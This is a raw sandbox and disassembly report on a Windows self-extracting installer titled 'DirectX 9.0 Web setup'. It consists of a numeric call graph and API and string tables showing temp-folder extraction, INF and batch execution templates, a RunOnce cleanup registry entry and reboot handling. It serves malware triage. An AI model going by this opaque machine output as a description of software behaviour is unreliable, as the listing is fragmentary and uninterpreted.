10053df 3277 10038cc 24 API calls 3275->3277 3276->3270 3276->3274 3276->3275 3278 10053f9 3276->3278 3279 1005440 lstrcmpiA 3276->3279 3282 10055bd 3276->3282 3284 1005591 LocalFree 3276->3284 3285 100562c LocalFree 3276->3285 3288 10055a3 3276->3288 3294 10053a3 lstrcmpiA 3276->3294 3301 10054c0 3276->3301 3607 10022ff lstrcpyA 3276->3607 3659 100198b RegCreateKeyExA 3276->3659 3680 1004560 3276->3680 3277->3300 3278->2933 3279->3276 3279->3288 3283 10038cc 24 API calls 3282->3283 3287 10055cd LocalFree 3283->3287 3284->3276 3284->3288 3285->3278 3287->3278 3288->3278 3700 1001b8b 3288->3700 3290 10055e1 3293 10038cc 24 API calls 3290->3293 3291 10054d4 GetProcAddress 3292 10055f7 3291->3292 3291->3301 3295 10038cc 24 API calls 3292->3295 3296 10055f5 3293->3296 3294->3276 3298 100560b FreeLibrary 3295->3298 3297 1005612 LocalFree 3296->3297 3299 1003547 3 API calls 3297->3299 3298->3297 3299->3300 3300->3278 3301->3290 3301->3291 3302 1005575 FreeLibrary 3301->3302 3303 1005626 FreeLibrary 3301->3303 3693 100370f lstrcpyA 3301->3693 3302->3284 3303->3285 3305 1002a34 6 API calls 3304->3305 3306 1004493 LocalAlloc 3305->3306 3307 10044c6 3306->3307 3308 10044aa 3306->3308 3310 1002a34 6 API calls 3307->3310 3309 10038cc 24 API calls 3308->3309 3311 10044ba 3309->3311 3312 10044ce 3310->3312 3313 1003547 3 API calls 3311->3313 3314 10044d2 3312->3314 3315 10044fa lstrcmpA 3312->3315 3321 10044bf 3313->3321 3316 10038cc 24 API calls 3314->3316 3317 1004547 LocalFree 3315->3317 3318 100450f 3315->3318 3319 10044e2 LocalFree 3316->3319 3317->3321 3320 1004161 28 API calls 3318->3320 3319->3321 3322 1004527 LocalFree 3320->3322 3321->2910 3321->2934 3322->3321 3324 1003554 GetLastError 3323->3324 3325 1003558 GetLastError 3323->3325 3324->2932 3325->2932 3327 1002a34 6 API calls 3326->3327 3328 100466a LocalAlloc 3327->3328 3329 1004690 3328->3329 3330 100467e 3328->3330 3332 1002a34 6 API calls 3329->3332 3331 10038cc 24 API calls 3330->3331 3334 100468e 3331->3334 
3333 1004698 3332->3333 3335 10046a8 lstrcmpA 3333->3335 3336 100469c 3333->3336 3334->2934 3335->3336 3337 10046c8 LocalFree 3335->3337 3338 10038cc 24 API calls 3336->3338 3337->3334 3338->3337 3344 1003613 3339->3344 3345 10035a4 3339->3345 3340 10035a9 LoadResource LockResource 3341 10035be lstrlenA 3340->3341 3340->3344 3341->3345 3342 1003624 FreeResource 3342->3344 3343 10035e7 FreeResource wsprintfA FindResourceA 3343->3344 3343->3345 3344->3188 3344->3189 3345->3340 3345->3342 3345->3343 3347 1004ba7 lstrcpyA 3346->3347 3348 1004b2c 3346->3348 3350 1004ba5 3347->3350 3409 1002f7a 3348->3409 3418 1003e60 lstrlenA LocalAlloc 3350->3418 3353 1004b43 lstrcpyA 3355 1004b9a 3353->3355 3356 1004b5f GetSystemInfo 3353->3356 3363 1005b32 3 API calls 3355->3363 3359 1004b71 3356->3359 3357 1004bc0 CreateDirectoryA 3360 1004bcc 3357->3360 3361 1004bef 3357->3361 3358 1004bd6 3362 1003f0d 40 API calls 3358->3362 3359->3355 3367 1005b32 3 API calls 3359->3367 3360->3358 3365 1003547 3 API calls 3361->3365 3364 1004be0 3362->3364 3363->3350 3366 1004be4 3364->3366 3369 1004c03 RemoveDirectoryA 3364->3369 3368 1004bf4 3365->3368 3366->3228 3370 1001f6e GetWindowsDirectoryA 3366->3370 3367->3355 3368->3366 3369->3366 3371 1001f9d 3370->3371 3372 1001f8d 3370->3372 3371->3213 3371->3229 3373 10038cc 24 API calls 3372->3373 3373->3371 3375 1005e49 3374->3375 3376 1005e2e GetDiskFreeSpaceA 3374->3376 3375->3237 3376->3375 3377 1005e4d MulDiv 3376->3377 3377->3375 3379 1001f5a CreateDirectoryA 3378->3379 3380 1001f68 3378->3380 3379->3380 3380->3237 3382 1003f21 3381->3382 3383 1003f29 GetCurrentDirectoryA SetCurrentDirectoryA 3381->3383 3382->3213 3384 1003f4c 3383->3384 3385 1003f6d 3383->3385 3386 10038cc 24 API calls 3384->3386 3431 1005e67 GetDiskFreeSpaceA 3385->3431 3388 1003f5c 3386->3388 3390 1003547 3 API calls 3388->3390 3395 1003f61 3390->3395 3391 1003fd2 GetVolumeInformationA 3393 1003fea 3391->3393 3394 100404f SetCurrentDirectoryA lstrcpynA 3391->3394 3392 
1003f7d 3396 1003547 3 API calls 3392->3396 3397 1003547 3 API calls 3393->3397 3398 100406e 3394->3398 3395->3382 3399 1003f98 GetLastError FormatMessageA 3396->3399 3401 1004003 GetLastError FormatMessageA 3397->3401 3403 1004082 3398->3403 3407 1004097 3398->3407 3400 100403b 3399->3400 3402 10038cc 24 API calls 3400->3402 3401->3400 3404 1004041 SetCurrentDirectoryA 3402->3404 3405 10038cc 24 API calls 3403->3405 3404->3382 3406 1004092 3405->3406 3406->3407 3407->3382 3434 1001fce 3407->3434 3410 1002f8f wsprintfA lstrcpyA 3409->3410 3411 1005b32 3 API calls 3410->3411 3412 1002fbd RemoveDirectoryA GetFileAttributesA 3411->3412 3413 1003015 CreateDirectoryA 3412->3413 3414 1002fd6 3412->3414 3415 1002fde GetTempFileNameA 3413->3415 3416 1003006 3413->3416 3414->3410 3414->3415 3415->3416 3417 1002ff7 DeleteFileA CreateDirectoryA 3415->3417 3416->3353 3416->3366 3417->3416 3419 1003ea0 lstrcpyA 3418->3419 3420 1003e82 3418->3420 3422 1005b32 3 API calls 3419->3422 3421 10038cc 24 API calls 3420->3421 3423 1003e92 3421->3423 3424 1003eb4 CreateFileA LocalFree 3422->3424 3425 1003547 3 API calls 3423->3425 3426 1003ed8 CloseHandle GetFileAttributesA 3424->3426 3427 1003eeb 3424->3427 3429 1003e97 3425->3429 3426->3427 3428 1003547 3 API calls 3427->3428 3430 1003eef 3427->3430 3428->3430 3429->3430 3430->3357 3430->3358 3432 1005e9a MulDiv 3431->3432 3433 1003f77 3431->3433 3432->3433 3433->3391 3433->3392 3435 1001fea 3434->3435 3436 100200e 3434->3436 3449 1001fb1 wsprintfA 3435->3449 3438 1002043 3436->3438 3439 1002014 3436->3439 3442 100200c 3438->3442 3451 1001fb1 wsprintfA 3438->3451 3450 1001fb1 wsprintfA 3439->3450 3440 1002000 3443 10038cc 24 API calls 3440->3443 3442->3382 3443->3442 3444 100202b 3446 10038cc 24 API calls 3444->3446 3446->3442 3447 100205f 3448 10038cc 24 API calls 3447->3448 3448->3442 3449->3440 3450->3444 3451->3447 3473 1002e6f 3452->3473 3454 10049e0 3455 10049e4 3454->3455 3456 10049f3 GetDlgItem ShowWindow GetDlgItem ShowWindow 
3454->3456 3457 1004a1d 3454->3457 3455->3254 3456->3457 3476 1003c60 3457->3476 3459 1004a2c 3461 10038cc 24 API calls 3459->3461 3460 1004a28 3460->3459 3482 1006e88 3460->3482 3462 1004abb 3461->3462 3464 1004abd 3462->3464 3466 1004ad3 3464->3466 3467 1004ac6 FreeResource 3464->3467 3465 1004a8c 3465->3459 3465->3464 3468 1004aef 3466->3468 3469 1004adf 3466->3469 3467->3466 3470 1004b14 3468->3470 3472 1004b01 SendMessageA 3468->3472 3471 10038cc 24 API calls 3469->3471 3470->3254 3471->3468 3472->3470 3474 1002a34 6 API calls 3473->3474 3475 1002e7f FindResourceA LoadResource LockResource 3474->3475 3475->3454 3477 1003c9f 3476->3477 3481 1003cf6 3477->3481 3487 1003b9b 3477->3487 3479 1003cbd 3479->3481 3495 1002cb2 3479->3495 3481->3460 3483 1006ec3 3482->3483 3484 1006f9b 3483->3484 3511 1005bca GetFileAttributesA 3483->3511 3513 1006d39 3483->3513 3484->3465 3488 1003ba9 3487->3488 3489 1003bda lstrcmpA 3488->3489 3490 1003bbe 3488->3490 3491 1003c2e 3489->3491 3494 1003bd3 3489->3494 3492 10038cc 24 API calls 3490->3492 3498 1003b00 3491->3498 3492->3494 3494->3479 3496 1002ce5 CloseHandle 3495->3496 3497 1002cc9 3495->3497 3496->3497 3497->3481 3499 1003b08 3498->3499 3500 1003b10 CreateFileA 3498->3500 3499->3494 3500->3499 3502 1003b7b 3500->3502 3502->3499 3503 1003b80 3502->3503 3506 1002b34 3503->3506 3507 1002b97 CreateFileA 3506->3507 3508 1002b3f 3506->3508 3507->3499 3508->3507 3509 1002b89 CharNextA 3508->3509 3510 1002b7a CreateDirectoryA 3508->3510 3509->3508 3510->3509 3512 1005bd9 3511->3512 3512->3483 3514 1006df4 3513->3514 3516 1006d4d 3513->3516 3518 1002cb2 CloseHandle 3514->3518 3528 1004888 3514->3528 3515 1006dcb 3515->3483 3516->3514 3516->3515 3520 1002c23 3516->3520 3518->3515 3556 100288f 3520->3556 3523 1002c3a 3523->3516 3524 1002c3f WriteFile 3525 1002c68 3524->3525 3526 1002c63 3524->3526 3525->3526 3527 1002c89 SendDlgItemMessageA 3525->3527 3526->3516 3527->3526 3529 10048b5 3528->3529 3530 100489b 3528->3530 3531 10049d0 
3529->3531 3532 10048c1 3529->3532 3533 10048ac 3530->3533 3535 1002cb2 CloseHandle 3530->3535 3590 1002e1b lstrcpyA lstrcpyA lstrcpyA 3531->3590 3532->3533 3536 10048c7 3532->3536 3537 100493e 3532->3537 3533->3515 3535->3533 3536->3533 3563 1002acd lstrlenA lstrlenA 3536->3563 3538 1004959 3537->3538 3539 100494a SetDlgItemTextA 3537->3539 3540 1002acd 8 API calls 3538->3540 3539->3538 3542 1004972 3540->3542 3542->3533 3543 100497a 3542->3543 3574 1004809 3543->3574 3549 1003b9b 29 API calls 3552 10049a4 3549->3552 3550 1002cb2 CloseHandle 3551 1004916 3550->3551 3553 1004923 SetFileAttributesA 3551->3553 3552->3533 3581 1003a7a LocalAlloc 3552->3581 3553->3533 3557 10028a6 MsgWaitForMultipleObjects 3556->3557 3558 10028f3 3557->3558 3559 10028bd PeekMessageA 3557->3559 3558->3523 3558->3524 3559->3557 3560 10028cb 3559->3560 3560->3557 3560->3558 3561 10028d6 DispatchMessageA 3560->3561 3562 10028e0 PeekMessageA 3560->3562 3561->3562 3562->3560 3564 1002af1 lstrcpyA lstrlenA 3563->3564 3565 1002aed 3563->3565 3566 1002b21 lstrcatA 3564->3566 3567 1002b08 lstrlenA 3564->3567 3565->3533 3569 1002d87 3565->3569 3566->3565 3567->3566 3568 1002b12 lstrlenA lstrlenA 3567->3568 3568->3566 3570 1002da0 3569->3570 3571 1002da4 DosDateTimeToFileTime 3569->3571 3570->3533 3570->3550 3571->3570 3572 1002db8 LocalFileTimeToFileTime 3571->3572 3572->3570 3573 1002dca SetFileTime 3572->3573 3573->3570 3575 1005bca GetFileAttributesA 3574->3575 3577 100481b 3575->3577 3576 1004870 SetFileAttributesA 3580 100481f 3576->3580 3577->3576 3578 1004161 28 API calls 3577->3578 3577->3580 3579 1004859 3578->3579 3579->3576 3579->3580 3580->3533 3580->3549 3582 1003a91 3581->3582 3583 1003aa8 lstrlenA LocalAlloc 3581->3583 3584 10038cc 24 API calls 3582->3584 3585 1003ade lstrcpyA 3583->3585 3586 1003abe 3583->3586 3588 1003aa6 3584->3588 3585->3588 3587 10038cc 24 API calls 3586->3587 3589 1003ad3 LocalFree 3587->3589 3588->3533 3589->3588 3590->3533 3592 1001e78 RegQueryValueExA 
3591->3592 3593 1001e9b 3591->3593 3594 1001e92 RegCloseKey 3592->3594 3595 1001e8f 3592->3595 3593->3264 3594->3593 3595->3594 3597 1001ef0 3596->3597 3598 1001ec9 RegQueryInfoKeyA 3596->3598 3597->3264 3599 1001ee4 3598->3599 3600 1001ee7 RegCloseKey 3598->3600 3599->3600 3600->3597 3602 1001e01 3601->3602 3603 1001e4c 3601->3603 3604 1005b32 3 API calls 3602->3604 3603->3264 3605 1001e13 WritePrivateProfileStringA _lopen 3604->3605 3605->3603 3606 1001e39 _llseek _lclose 3605->3606 3606->3603 3608 1002326 3607->3608 3709 1001840 3608->3709 3613 1002360 lstrcpyA 3615 1005b32 3 API calls 3613->3615 3614 1002377 lstrcpyA 3616 1002375 3614->3616 3615->3616 3617 1005be8 2 API calls 3616->3617 3618 1002383 3617->3618 3619 1002511 3618->3619 3620 1002391 lstrcmpiA 3618->3620 3621 1005be8 2 API calls 3619->3621 3620->3619 3622 10023a1 3620->3622 3623 1002519 3621->3623 3624 1005bca GetFileAttributesA 3622->3624 3625 1002575 LocalAlloc 3623->3625 3626 100251f lstrcmpiA 3623->3626 3627 10023ad 3624->3627 3629 10023b1 3625->3629 3630 100259d GetFileAttributesA 3625->3630 3626->3625 3628 100252b lstrlenA lstrlenA LocalAlloc 3626->3628 3627->3629 3632 1001840 2 API calls 3627->3632 3628->3629 3631 100255e wsprintfA 3628->3631 3638 10038cc 24 API calls 3629->3638 3633 10025e6 3630->3633 3634 10025af 3630->3634 3637 1002601 3631->3637 3639 10023db lstrlenA 3632->3639 3636 10025e9 lstrcpyA 3633->3636 3634->3633 3635 10025b3 lstrcpyA 3634->3635 3640 10025f2 3635->3640 3641 10025ca 3635->3641 3636->3640 3637->3276 3642 1002599 3638->3642 3643 1002411 3639->3643 3644 10023ee 3639->3644 3718 10021fb 3640->3718 3641->3640 3645 10025cf lstrcatA 3641->3645 3642->3637 3646 1002414 LocalAlloc 3643->3646 3648 1001840 2 API calls 3644->3648 3645->3636 3646->3629 3649 100243a GetPrivateProfileIntA GetPrivateProfileStringA 3646->3649 3650 1002404 3648->3650 3653 1002490 lstrcpyA lstrcpyA 3649->3653 3654 10024b5 3649->3654 3650->3646 3652 100240c lstrlenA 3650->3652 3652->3646 3653->3637 
3656 10024e6 wsprintfA 3654->3656 3657 10024c6 GetShortPathNameA 3654->3657 3656->3637 3657->3656 3660 10019f2 3659->3660 3661 1001b86 3659->3661 3662 1001a00 wsprintfA RegQueryValueExA 3660->3662 3663 1001a2f 3660->3663 3661->3276 3662->3660 3662->3663 3664 1001a34 RegCloseKey 3663->3664 3665 1001a49 GetSystemDirectoryA 3663->3665 3664->3661 3666 1005b32 3 API calls 3665->3666 3667 1001a6d LoadLibraryA 3666->3667 3668 1001a85 GetProcAddress FreeLibrary 3667->3668 3669 1001b0b GetModuleFileNameA 3667->3669 3668->3669 3672 1001aa9 GetSystemDirectoryA 3668->3672 3670 1001b23 RegCloseKey 3669->3670 3671 1001acc lstrlenA lstrlenA LocalAlloc 3669->3671 3670->3661 3674 1001af9 3671->3674 3675 1001b2e wsprintfA lstrlenA RegSetValueExA RegCloseKey LocalFree 3671->3675 3672->3671 3673 1001abb 3672->3673 3676 1005b32 3 API calls 3673->3676 3677 10038cc 24 API calls 3674->3677 3675->3661 3676->3671 3679 1001b09 3677->3679 3679->3670 3681 100457b CreateProcessA 3680->3681 3690 100464c 3680->3690 3682 1004609 3681->3682 3683 100459f WaitForSingleObject GetExitCodeProcess 3681->3683 3684 1003547 3 API calls 3682->3684 3685 10045c2 3683->3685 3691 10045dd 3683->3691 3686 100460e GetLastError FormatMessageA 3684->3686 3685->3691 3689 10038cc 24 API calls 3686->3689 3689->3690 3690->3276 3744 10028fa 3691->3744 3692 1004602 3692->3690 3694 1005b32 3 API calls 3693->3694 3695 1003739 GetFileAttributesA 3694->3695 3696 1003762 LoadLibraryA 3695->3696 3697 100374b 3695->3697 3699 100376b 3696->3699 3697->3696 3698 100374f LoadLibraryExA 3697->3698 3698->3699 3699->3301 3701 1001ba3 RegOpenKeyExA 3700->3701 3702 1001c7c 3700->3702 3701->3702 3703 1001bc5 RegQueryValueExA 3701->3703 3702->3278 3704 1001bf1 GetSystemDirectoryA 3703->3704 3705 1001c72 RegCloseKey 3703->3705 3706 1001c1d 3704->3706 3707 1001c2e wsprintfA lstrlenA RegSetValueExA 3704->3707 3705->3702 3708 1005b32 3 API calls 3706->3708 3707->3705 3708->3707 3710 100184f 3709->3710 3712 1001866 3710->3712 3714 100186e 
3710->3714 3732 1005b00 3710->3732 3713 1005b00 2 API calls 3712->3713 3712->3714 3713->3712 3715 1001da9 3714->3715 3716 1001db2 lstrlenA 3715->3716 3717 1001dbe 3715->3717 3716->3717 3717->3613 3717->3614 3719 100221c 3718->3719 3728 10022ef 3718->3728 3720 1002225 GetModuleFileNameA 3719->3720 3719->3728 3726 1002247 3720->3726 3720->3728 3721 1002255 IsDBCSLeadByte 3721->3726 3722 10022db CharNextA 3724 10022e0 CharNextA 3722->3724 3723 100226f CharNextA CharUpperA 3725 10022b1 CharUpperA 3723->3725 3723->3726 3724->3721 3724->3728 3725->3726 3727 10022bf lstrcpyA lstrlenA 3725->3727 3726->3721 3726->3722 3726->3723 3726->3724 3737 1005b71 lstrlenA CharPrevA 3726->3737 3727->3724 3728->3637 3731 10022a7 3731->3727 3733 1005b07 3732->3733 3734 1005b28 3733->3734 3735 1005ad3 IsDBCSLeadByte 3733->3735 3736 1005b1a CharNextA 3733->3736 3734->3710 3735->3733 3736->3733 3738 1005b97 CharPrevA 3737->3738 3739 1005ba0 3738->3739 3740 1005b91 3738->3740 3741 1005bb2 CharNextA 3739->3741 3742 1005ba9 CharPrevA 3739->3742 3743 100228c lstrlenA CharPrevA 3739->3743 3740->3738 3740->3739 3741->3743 3742->3741 3742->3743 3743->3727 3743->3731 3745 1002909 3744->3745 3747 1002903 CloseHandle CloseHandle 3744->3747 3748 1002613 3745->3748 3747->3690 3747->3692 3749 1002620 3748->3749 3751 1002634 3748->3751 3752 1001f34 3749->3752 3751->3747 3753 1001ef8 14 API calls 3752->3753 3754 1001f3d 3753->3754 3754->3751 3756 1001953 RegOpenKeyExA 3755->3756 3757 1001989 3755->3757 3756->3757 3758 1001972 RegDeleteValueA RegCloseKey 3756->3758 3757->2942 3758->3757 3760 10018e1 LookupPrivilegeValueA AdjustTokenPrivileges 3759->3760 3761 10018d5 3759->3761 3760->3761 3762 1001920 ExitWindowsEx 3760->3762 3764 10038cc 24 API calls 3761->3764 3762->3761 3763 100193c 3762->3763 3763->2960 3764->3763

Control-flow Graph (function at 10022ff; legend: Executed / Not Executed; graph image not reproduced here)
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,00000000,00000001,7591F530,00000000), ref: 0100231B
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,01001324), ref: 01002366
                                                                                                • lstrcpyA.KERNEL32(?,?,?,?,01001324), ref: 01002379
                                                                                                • lstrcmpiA.KERNEL32(00000000,.INF), ref: 01002397
                                                                                                • lstrlenA.KERNEL32(DefaultInstall,?,01001318,?), ref: 010023E8
                                                                                                • lstrlenA.KERNEL32(?,?,01001314), ref: 0100240D
                                                                                                • LocalAlloc.KERNEL32(00000040,00000200), ref: 0100241B
                                                                                                • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 01002457
                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01001251,?,00000008,?), ref: 01002486
                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 010024A2
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 010024AE
                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 010024DE
                                                                                                • wsprintfA.USER32 ref: 01002503
                                                                                                • lstrcmpiA.KERNEL32(00000000,.BAT), ref: 01002525
                                                                                                • lstrlenA.KERNEL32(Command.com /c %s), ref: 01002537
                                                                                                • lstrlenA.KERNEL32(?), ref: 01002542
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008), ref: 0100254B
                                                                                                • wsprintfA.USER32 ref: 01002567
                                                                                                • LocalAlloc.KERNEL32(00000040,00000400,?,0000002E,?,0000002E), ref: 0100257C
                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 010025A4
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 010025C1
                                                                                                • lstrcatA.KERNEL32(?,01001324), ref: 010025E1
                                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 010025F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$AllocLocal$PrivateProfilelstrcmpiwsprintf$AttributesFileNamePathShortStringlstrcat
                                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                • API String ID: 1932099537-1383298736
                                                                                                • Opcode ID: 9cfc3f925ef709eea2b6e4c056a8937429d4c1d82baa32382744840923556eea
                                                                                                • Instruction ID: f0cbcbf04177e37c30e3133f67ae01d03030f470cf72cf61e2aa79d8b69a16e6
                                                                                                • Opcode Fuzzy Hash: 9cfc3f925ef709eea2b6e4c056a8937429d4c1d82baa32382744840923556eea
                                                                                                • Instruction Fuzzy Hash: 47916071A00249BAFB23DBA4CD49FDE7BBCAB45700F144195F6C5E6080E7B5DA808B60

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,00000000,?,00000001,7591F530), ref: 010019E4
                                                                                                • wsprintfA.USER32 ref: 01001A09
                                                                                                • RegQueryValueExA.KERNELBASE(00000000,wextract_cleanup0,00000000,00000000,00000000,?), ref: 01001A1D
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 01001A37
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01001A56
                                                                                                • LoadLibraryA.KERNELBASE(?,?,advpack.dll), ref: 01001A74
                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01001A8B
                                                                                                • FreeLibrary.KERNELBASE(?), ref: 01001A9F
                                                                                                • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 01001AB1
                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01001AD7
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01001AE2
                                                                                                • LocalAlloc.KERNEL32(00000040,00000050), ref: 01001AEB
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000104), ref: 01001B19
                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,000004B5,00000000,00000000,00000010,00000000), ref: 01001B26
                                                                                                • wsprintfA.USER32 ref: 01001B59
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01001B63
                                                                                                • RegSetValueExA.KERNELBASE(00000000,wextract_cleanup0,00000000,00000001,00000000,00000001), ref: 01001B70
                                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 01001B79
                                                                                                • LocalFree.KERNEL32(00000000), ref: 01001B80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Closelstrlen$DirectoryFreeLibraryLocalSystemValuewsprintf$AddressAllocCreateFileLoadModuleNameProcQuery
                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                • API String ID: 3084642846-1709460465
                                                                                                • Opcode ID: c9262a911cf3084d63b0fa5f4be99a77ebbc8ce96a0a011a0b05c5970966fbed
                                                                                                • Instruction ID: bcd9c67c776e79ec80fa89b258506c9e143caafd4bb2848af9ab02cf1fab0281
                                                                                                • Opcode Fuzzy Hash: c9262a911cf3084d63b0fa5f4be99a77ebbc8ce96a0a011a0b05c5970966fbed
                                                                                                • Instruction Fuzzy Hash: 31514071A40218BBEB229BA5DD49EDE7BBCEB08700F004495F685E6085D7B9DA41CF90

                                                                                                Control-flow Graph (graph image not reproduced)
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01004C87
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 01004C93
                                                                                                  • Part of subcall function 01002A34: FreeResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A97
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,INSTANCECHECK,?,00000104,EXTRACTOPT,0100B494,00000004,?,00000000), ref: 01004CFD
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 01004D0C
                                                                                                • FindResourceA.KERNEL32(00000000,VERCHECK,0000000A), ref: 01004DA7
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 01004DB5
                                                                                                • #17.COMCTL32(?,00000000), ref: 01004DC6
                                                                                                • CloseHandle.KERNEL32(00000000,00000524,DirectX 9.0 Web setup,00000000,00000020,00000004,?,00000000), ref: 01004D50
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$CreateEventLoad$CloseErrorFreeHandleLastLockMessageMutexSizeof
                                                                                                • String ID: DirectX 9.0 Web setup$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                • API String ID: 612345255-3861042123
                                                                                                • Opcode ID: 6e61b948a8d2d4fbc5d951fd4a04286bee1605d2895dff06b8bbb81afb43d88a
                                                                                                • Instruction ID: 917ad5cb818e3c264ff7b4ff8797261597b45a6a0e97e5d7e7b17e1e85fa401a
                                                                                                • Opcode Fuzzy Hash: 6e61b948a8d2d4fbc5d951fd4a04286bee1605d2895dff06b8bbb81afb43d88a
                                                                                                • Instruction Fuzzy Hash: 7C5127B0644385BAF7336B289D89FAA3B9DEB55744F000465F7C5DA1C5CBB98E808728

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,759183C0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01003F37
                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000), ref: 01003F46
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003F29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 1611563598-1193786559
                                                                                                • Opcode ID: 7272f09d9cc4f95465a0350aed80e63b7b027015254899d99047417d38069267
                                                                                                • Instruction ID: a82620e449f5b1383de194113fdcc55ed895d330ee11bc6e5bf4c8a97130a73d
